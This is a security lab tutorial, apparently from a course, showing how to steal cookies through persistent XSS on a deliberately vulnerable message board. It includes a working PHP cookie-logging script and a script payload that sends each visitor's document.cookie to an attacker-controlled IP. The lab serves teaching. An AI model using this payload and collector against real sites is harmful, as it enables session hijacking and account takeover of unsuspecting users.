Stealing Cookies with Persistent XSS

        Stealing Cookies with Persistent XSS 

What You Need

• A Backtrack 5 machine, real or virtual. I used a BackTrack 5 R2 virtual machine.

Purpose

If a website has a Persistent XSS vulnerability, you can inject code and attack other users. We'll use this attack to steal a cookie.
This sort of attack is used commonly to gain access to another person's acount on webmail or social network accounts.

Starting Apache

On your BackTrack Linux machine, at the #> prompt, enter these commands followed by the Enter key:

service apache2 restartnetstat -an | more

You should see the local address 0.0.0.0:80 in a State of LISTEN, as shown below:

Testing PHP

At the #> prompt, enter these commands followed by the Enter key:

cd /var/wwwnano test.php

In nano, type in the code shown below:

<?php phpinfo(); ?>

Your screen should look like this:

Press Ctrl+X, then press Y, then press the Enter key. This saves your file.
From the menu bar in the top left of the BackTrack desktop, click Applications, Internet, Firefox Web Browser.
In the Firefox address bar, enter localhost/test.php and then press the Enter key. You should see a PHP configuration page, as shown below:

This verifies that Apache and PHP are running correctly.
If PHP doesn't work, try re-extracting BackTrack from the original 7-zip file.

Writing a Cookie-Storage PHP Script

The script we will use does these things:

• When a user sends an HTTP GET request to this script with a parameter c, that parameter is stored in a file
• It will also store two other values: the IP address and the referring URL
• It will save this information in a file named cookies.html in the /tmp folder
• It will then return to the original page, so that the user has no idea that anything unusual has happened On your BackTrack linux machine, in a Terminal window, execute this command:

  nano /var/www/steal.php

  In nano, enter this script:

  <?php
  $cookie = $_GET['c'];
  $ip = getenv ('REMOTE_ADDR');
  $date = date("j F, Y, g:i a");
  $referer = getenv ('HTTP_REFERER');
  $out = 'Cookie: ' . $cookie . "\n";
  $out = $out . 'IP: ' . $ip . "\n";
  $out = $out . 'Date: ' . $date . "\n";
  $out = $out . 'Referer: ' . $referer  . "\n\n";
  $fp = fopen('/tmp/cookies.html', 'a');
  fwrite($fp, $out);
  fclose($fp);
  header ("Location: http://games.samsclass.info");
  ?>
  <HTML></HTML>
  

  as shown below:
  Save the file with Ctrl+X, Y, Enter.
  
  

  Finding your Backtrack Linux Server's IP Address

  Make sure your BackTrack Linux virtual machine is using Bridged networking, not NAT.If necessary, renew the IP address with the dhclient command.
  In Backtrack, in Firefox, execute this command:
  

  ifconfig

  Find your IP address and make a note of it.

  Testing the Cookie-Storage Script

  On your host machine, (NOT the Backtrack machine), open a Web browser and go to this URL, replacing the IP address with the IP address of your Backtrack machine:

  http://192.168.5.36/steal.php?c=test123

  If the PHP script is working correctly, your browser will forward to games.samsclass.info, as shown below:
  If you made any errors typing in the script, you will see an error message telling you which line has a problem. Fix those problems and don't proceed to the next section until the PHP script is working.
  
  

  Viewing the Stolen Data

  In Backtrack, in Firefox, execute this command:

  cat /tmp/cookies.html

  You should see the stolen data, as shown below:
  
  

  Viewing the Vulnerable Message Board

  On your host system, open a Web browser and go to this page:

  http://games.samsclass.info/vulnphp/

  This is a simple message board, using your name as an authentication cookie.In the "User ID Page", enter your name in the box, as shown below. (Don't use the literal string "YOUR NAME"--instead, use your own real name.
  
  Click the Enter button.
  On the next page, if any comments appear, click the "Erase Comments" button.
  Enter this comment, replacing the IP address with the IP address of your BackTrack Linux server:
  

  <script>
  document.location="http://192.168.5.36/steal.php?c=" + document.cookie
  </script>
  

  
  Click the "Post Comment" button.
  The page just stole your cookie, and it will continue to steal cookies from everyone who views it until someone clicks the "Erase Comments" button.
  
  

  Viewing the Stolen Data

  In Backtrack, in Firefox, execute this command:

  cat /tmp/cookies.html

  You should see the stolen data, with your name in it, as shown below: